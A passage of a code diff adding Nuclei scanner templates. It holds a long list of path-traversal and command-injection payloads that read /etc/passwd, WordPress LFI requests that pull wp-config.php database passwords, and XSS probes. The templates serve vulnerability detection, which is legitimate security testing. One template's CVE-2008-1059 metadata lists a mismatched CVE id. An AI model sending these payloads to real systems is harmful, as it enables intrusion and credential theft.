350	+	- "forum1.asp?n=1753&nn=/etc/passwd"
351	+	- "forum1.asp?n=1753&nn=/etc/passwd%00"
352	+	- "forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1\|234\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
353	+	- "forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1\|234\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren"
354	+	- "forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1\|234\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec"
355	+	- "forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1\|234\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
356	+	- "forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1\|234\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
357	+	- "forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1"
358	+	- "forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1"
359	+	- "forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1"
360	+	- "forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1"
361	+	- "forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1"
362	+	- "forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60"
363	+	- "forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00"
364	+	- "forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd"
365	+	- "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd"
366	+	- "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00"
367	+	- "forum_arc.asp?n=%60/etc/passwd%60\|36\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
368	+	- "forum_arc.asp?n=../../../../../../../../../etc/passwd%00\|36\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
369	+	- "forum_arc.asp?n=/../../../../../../../../etc/passwd\|36\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
370	+	- "forum_arc.asp?n=/etc/passwd%00\|36\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
371	+	- "forum_arc.asp?n=/etc/passwd\|36\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
372	+	- "forum_professionnel.asp?n=%60/etc/passwd%60\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
373	+	- "forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
374	+	- "forum_professionnel.asp?n=/../../../../../../../../etc/passwd\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
375	+	- "forum_professionnel.asp?n=/etc/passwd%00\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
376	+	- "forum_professionnel.asp?n=/etc/passwd\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
377	+	- "gallery/index.php?include=../../../../../../../../../etc/passwd"
378	+	- "generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
379	+	- "guestbook.cgi?user=cpanel&template=\|/bin/cat%20/etc/passwd\|"
380	+	- "hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
381	+	- "htgrep?file=index.html&hdr=/etc/passwd"
382	+	- "htmlscript?../../../../../../../../../../etc/passwd"
383	+	- "htsearch?exclude=%60/etc/passwd%60"
384	+	- "i?/etc/passwd"
385	+	- "imprimer.asp?no=%60/etc/passwd%60\|44\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
386	+	- "imprimer.asp?no=../../../../../../../../../etc/passwd%00\|44\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
387	+	- "imprimer.asp?no=/../../../../../../../../etc/passwd\|44\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
388	+	- "imprimer.asp?no=/etc/passwd%00\|44\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
389	+	- "imprimer.asp?no=/etc/passwd\|44\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
390	+	- "index.php?download=/etc/passwd"
391	+	- "index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd"
392	+	- "index.php?page=../../../../../../../../../../etc/passwd"
393	+	- "index.php?\|=../../../../../../../../../etc/passwd"
394	+	- "info2www '(../../../../../../../bin/mail root </etc/passwd>"
395	+	- "ion-p?page=../../../../../etc/passwd"
396	+	- "jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd"
397	+	- "jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd"
398	+	- "k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor"
399	+	- "loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd"
400	+	- "logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00\|"
401	+	- "magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd"
402	+	- "mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
403	+	- "mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"
404	+	- "mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd"
405	+	- "main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd"
406	+	- "modif_infos.asp?n=%60/etc/passwd%60"
407	+	- "modif_infos.asp?n=../../../../../../../../../etc/passwd%00"
408	+	- "modif_infos.asp?n=/../../../../../../../../../etc/passwd"
409	+	- "modif_infos.asp?n=/etc/passwd"
410	+	- "modif_infos.asp?n=/etc/passwd%00"
411	+	- "modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd"
412	+	- "mrtg.cfg?cfg=../../../../../../../../etc/passwd"
413	+	- "mrtg.cgi?cfg=../../../../../../../../etc/passwd"
414	+	- "multihtml.pl?multi=/etc/passwd%00html"
415	+	- "mylog.html?screen=/etc/passwd"
416	+	- "mylog.phtml?screen=/etc/passwd"
417	+	- "netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd"
418	+	- "netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd"
419	+	- "newsdesk.cgi?t=../../../../../../../../../../etc/passwd"
420	+	- "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
421	+	- "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00"
422	+	- "nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0"
423	+	- "opendir.php?/etc/passwd"
424	+	- "opendir.php?requesturl=/etc/passwd"
425	+	- "page.cgi?../../../../../../../../../../etc/passwd"
426	+	- "pals-cgi?palsAction=restart&documentName=/etc/passwd"
427	+	- perl/-e%20%22system('cat%20/etc/passwd');\%22
428	+	- "pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd\|'"
429	+	- "pfdispaly.cgi?../../../../../../../../../../etc/passwd"
430	+	- "pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd\|'"
431	+	- "phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd"
432	+	- "phf?Qname=root%0Acat%20/etc/passwd%20"
433	+	- "php.cgi?/etc/passwd"
434	+	- "php/mylog.html?screen=/etc/passwd"
435	+	- "php/mylog.phtml?screen=/etc/passwd"
436	+	- "phprocketaddin/?page=../../../../../../../../../../etc/passwd"
437	+	- "phptonuke.php?filnavn=/etc/passwd"
438	+	- "phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd"
439	+	- "powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd"
440	+	- "publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd\|&output_number=10"
441	+	- "put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd"
442	+	- "quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id="
443	+	- "r.cgi?FILE=../../../../../../../../../../etc/passwd"
444	+	- "rubrique.asp?no=%60/etc/passwd%60\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
445	+	- "rubrique.asp?no=../../../../../../../../../etc/passwd%00\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
446	+	- "rubrique.asp?no=/../../../../../../etc/passwd\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
447	+	- "rubrique.asp?no=/../../../etc/passwd\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
448	+	- "rubrique.asp?no=/etc/passwd%00\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
449	+	- "rubrique.asp?no=/etc/passwd\|55\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
450	+	- "sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
451	+	- "search.pl?form=../../../../../../../../../../etc/passwd%00"
452	+	- "search?NS-query-pat=../../../../../../../../../../etc/passwd"
453	+	- "sendtemp.pl?templ=../../../../../../../../../../etc/passwd"
454	+	- "servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00"
455	+	- "sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd"
456	+	- "shop.cgi?page=../../../../../../../etc/passwd"
457	+	- "shop/member_html.cgi?file=;cat%20/etc/passwd\|"
458	+	- "shop/member_html.cgi?file=\|cat%20/etc/passwd\|"
459	+	- "shop/normal_html.cgi?file=;cat%20/etc/passwd\|"
460	+	- "shop/normal_html.cgi?file=\|cat%20/etc/passwd\|"
461	+	- "shopper.cgi?newpage=../../../../../../../../../../etc/passwd"
462	+	- "shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd\|"
463	+	- "shoutbox.php?conf=../../../../../../../etc/passwd"
464	+	- "shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20"
465	+	- "simple/view_page?mv_arg=\|cat%20/etc/passwd\|"
466	+	- "smartsearch.cgi?keywords=\|/bin/cat%20/etc/passwd\|"
467	+	- "smartsearch/smartsearch.cgi?keywords=\|/bin/cat%20/etc/passwd\|"
468	+	- "ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
469	+	- "store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html"
470	+	- "store/index.cgi?page=../../../../../../../../etc/passwd"
471	+	- "story.pl?next=../../../../../../../../../../etc/passwd%00"
472	+	- "story/story.pl?next=../../../../../../../../../../etc/passwd%00"
473	+	- "support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
474	+	- "talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1"
475	+	- "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd"
476	+	- "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd"
477	+	- "tmp_view.php?file=/etc/passwd"
478	+	- "traffic.cgi?cfg=../../../../../../../../etc/passwd"
479	+	- "ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd"
480	+	- "userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd"
481	+	- "ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd"
482	+	- "view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
483	+	- "viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1"
484	+	- "viewpage.php?file=/etc/passwd"
485	+	- "viewsource?/etc/passwd"
486	+	- "way-board.cgi?db=/etc/passwd%00"
487	+	- "way-board/way-board.cgi?db=/etc/passwd%00"
488	+	- "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif"
489	+	- "webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd"
490	+	- "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd"
491	+	- "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd\|&CODE=PHOLD"
492	+	- "webdist.cgi?distloc=;cat%20/etc/passwd"
493	+	- "webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
494	+	- "webplus?script=../../../../../../../../../../etc/passwd"
495	+	- "webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd"
496	+	- "whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
497	+	- "whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
498	+	- "whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
499	+	- "zml.cgi?file=../../../../../../../../../../etc/passwd%00"
500	+	- "~nobody/etc/passwd"
501	+	attack: clusterbomb
502	+	stop-at-first-match: true
503	+	matchers:
504	+	- type: word
505	+	part: body
506	+	words:
507	+	- 'root:x:'
508	+
509	+	redirects: false
510	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2008/CVE-2008-1059.yaml

1	+	id: CVE-2008-1059
2	+
3	+	info:
4	+	name: WordPress Sniplets 1.1.2 - Local File Inclusion
5	+	author: dhiyaneshDK
6	+	severity: high
7	+	description: \|
8	+	PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/5194
11	+	- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
13	+	- http://secunia.com/advisories/29099
14	+	classification:
15	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
16	+	cvss-score: 7.5
17	+	cve-id: CVE-2008-1061
18	+	cwe-id: CWE-22
19	+	tags: cve,cve2008,wordpress,wp-plugin,lfi,wp,sniplets
20	+
21	+	requests:
22	+	- method: GET
23	+	path:
24	+	- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
25	+
26	+	matchers-condition: and
27	+	matchers:
28	+	- type: word
29	+	part: body
30	+	words:
31	+	- "DB_NAME"
32	+	- "DB_PASSWORD"
33	+	condition: and
34	+
35	+	- type: status
36	+	status:
37	+	- 200
38	+
39	+	# Enhanced by mp on 2022/07/29
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2008/CVE-2008-1061.yaml

1	+	id: CVE-2008-1061
2	+
3	+	info:
4	+	name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
5	+	author: dhiyaneshDK
6	+	severity: medium
7	+	description: \|
8	+	Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/5194
11	+	- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
13	+	- http://secunia.com/advisories/29099
14	+	tags: cve,cve2008,xss,wordpress,wp-plugin,wp,sniplets
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	part: body
25	+	words:
26	+	- "</script><script>alert(document.domain)</script>"
27	+
28	+	- type: word
29	+	part: header
30	+	words:
31	+	- text/html
32	+
33	+	- type: status
34	+	status:
35	+	- 200
36	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2014/CVE-2014-2383.yaml

1	1		id: CVE-2014-2383
2	2
3	3		info:
4		-	name: Arbitrary file read in dompdf < v0.6.0
5		-	author: 0x_Akoko
	4	+	name: Dompdf < v0.6.0 - Local File Inclusion
	5	+	author: 0x_Akoko,akincibor,ritikchaddha
6	6		severity: high
7		-	description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
	7	+	description: \|
	8	+	A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
8	9		reference:
9		-	- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
10	10		- https://www.exploit-db.com/exploits/33004
11	11		- http://seclists.org/fulldisclosure/2014/Apr/258
12	12		- https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
	13	+	- https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
	14	+	- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
13	15		classification:
14	16		cve-id: CVE-2014-2383
15	17		metadata:
16		-	unix-payload: /dompdf.php?input_file=/etc/passwd
17		-	win-payload: /dompdf.php?input_file=C:/windows/win.ini
18		-	tags: cve,cve2014,dompdf,lfi
	18	+	verified: "true"
	19	+	tags: cve,cve2014,dompdf,lfi,wordpress,wp-plugin,wp
19	20
20	21		requests:
21	22		- method: GET
22	23		path:
23		-	- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
24		-	- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
25		-	- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
26		-	- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
	24	+	- "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	25	+	- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
	26	+	- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	27	+	- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	28	+	- "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	29	+	- "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	30	+	- "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	31	+	- "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	32	+	- "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	33	+	- "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
	34	+	- "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
27	35
28	36		stop-at-first-match: true
29	37		matchers-condition: and
30	38		matchers:
	39	+	- type: regex
	40	+	regex:
	41	+	- "root:[x*]:0:0"
	42	+
31	43		- type: word
32	44		words:
33	45		- "application/pdf"
		skipped 5 lines
39	51		status:
40	52		- 200
41	53
42		-	# Enhanced by mp on 2022/02/24
	54	+	# Enhanced by mp on 2022/08/06
43	55

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2014/CVE-2014-9119.yaml

1	+	id: CVE-2014-9119
2	+
3	+	info:
4	+	name: WordPress DB Backup <=4.5 - Local File Inclusion
5	+	author: dhiyaneshDK
6	+	severity: high
7	+	description: \|
8	+	WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
11	+	- https://www.exploit-db.com/exploits/35378
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2014-9119
13	+	- https://wpvulndb.com/vulnerabilities/7726
14	+	classification:
15	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
16	+	cvss-score: 7.5
17	+	cve-id: CVE-2014-9119
18	+	cwe-id: CWE-22
19	+	tags: cve,cve2014,wordpress,wp-plugin,lfi,wp,backup
20	+
21	+	requests:
22	+	- method: GET
23	+	path:
24	+	- '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
25	+
26	+	matchers-condition: and
27	+	matchers:
28	+	- type: word
29	+	part: body
30	+	words:
31	+	- "DB_NAME"
32	+	- "DB_PASSWORD"
33	+	condition: and
34	+
35	+	- type: status
36	+	status:
37	+	- 200
38	+
39	+	# Enhanced by mp on 2022/08/05
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml

1	+	id: CVE-2015-1000005
2	+
3	+	info:
4	+	name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
5	+	author: dhiyaneshDK
6	+	severity: high
7	+	description: \|
8	+	WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
12	+	- http://www.vapidlabs.com/advisory.php?v=142
13	+	classification:
14	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
15	+	cvss-score: 7.5
16	+	cve-id: CVE-2015-1000005
17	+	cwe-id: CWE-22
18	+	tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
19	+
20	+	requests:
21	+	- method: GET
22	+	path:
23	+	- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
24	+
25	+	matchers-condition: and
26	+	matchers:
27	+	- type: regex
28	+	regex:
29	+	- "root:[x*]:0:0"
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+
35	+	# Enhanced by mp on 2022/04/21
36	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml

1	+	id: CVE-2015-1000010
2	+
3	+	info:
4	+	name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
5	+	author: dhiyaneshDK
6	+	severity: high
7	+	description: \|
8	+	WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
9	+	reference:
10	+	- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
11	+	- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
13	+	- http://www.vapidlabs.com/advisory.php?v=147
14	+	classification:
15	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
16	+	cvss-score: 7.5
17	+	cve-id: CVE-2015-1000010
18	+	cwe-id: CWE-22
19	+	tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
20	+
21	+	requests:
22	+	- method: GET
23	+	path:
24	+	- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
25	+
26	+	matchers-condition: and
27	+	matchers:
28	+	- type: regex
29	+	regex:
30	+	- "root:[x*]:0:0"
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+
36	+	# Enhanced by mp on 2022/07/29
37	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-1579.yaml

1	+	id: CVE-2015-1579
2	+
3	+	info:
4	+	name: WordPress Slider Revolution - Local File Disclosure
5	+	author: pussycat0x
6	+	severity: high
7	+	description: \|
8	+	Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
9	+	reference:
10	+	- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
11	+	- https://cxsecurity.com/issue/WLB-2021090129
12	+	- https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2015-1579
14	+	classification:
15	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
16	+	cvss-score: 7.5
17	+	cve-id: CVE-2015-1579
18	+	cwe-id: CWE-22
19	+	metadata:
20	+	google-dork: inurl:/wp-content/plugins/revslider
21	+	tags: cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp
22	+
23	+	requests:
24	+	- method: GET
25	+	path:
26	+	- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
27	+	- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
28	+
29	+	stop-at-first-match: true
30	+	matchers-condition: and
31	+	matchers:
32	+	- type: word
33	+	part: body
34	+	words:
35	+	- "'DB_NAME'"
36	+	- "'DB_PASSWORD'"
37	+	- "'DB_USER'"
38	+	condition: and
39	+
40	+	- type: status
41	+	status:
42	+	- 200
43	+
44	+	# Enhanced by mp on 2022/07/29
45	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-4127.yaml

1	+	id: CVE-2015-4127
2	+
3	+	info:
4	+	name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
5	+	author: daffainfo
6	+	severity: medium
7	+	description: \|
8	+	Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/37112
11	+	- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
13	+	- https://wordpress.org/plugins/church-admin/changelog/
14	+	tags: cve,cve2015,wordpress,xss,wp-plugin,wp
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	part: body
25	+	words:
26	+	- "</script><script>alert(document.domain)</script>"
27	+
28	+	- type: word
29	+	part: header
30	+	words:
31	+	- text/html
32	+
33	+	- type: status
34	+	status:
35	+	- 200
36	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2018/CVE-2018-20526.yaml

1	+	id: CVE-2018-20526
2	+
3	+	info:
4	+	name: Roxy Fileman 1.4.5 - Unrestricted File Upload
5	+	author: DhiyaneshDK
6	+	severity: critical
7	+	description: \|
8	+	Roxy Fileman 1.4.5 allows unrestricted file upload in upload.php.
9	+	reference:
10	+	- http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
11	+	- https://www.exploit-db.com/exploits/46085/
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2018-20526
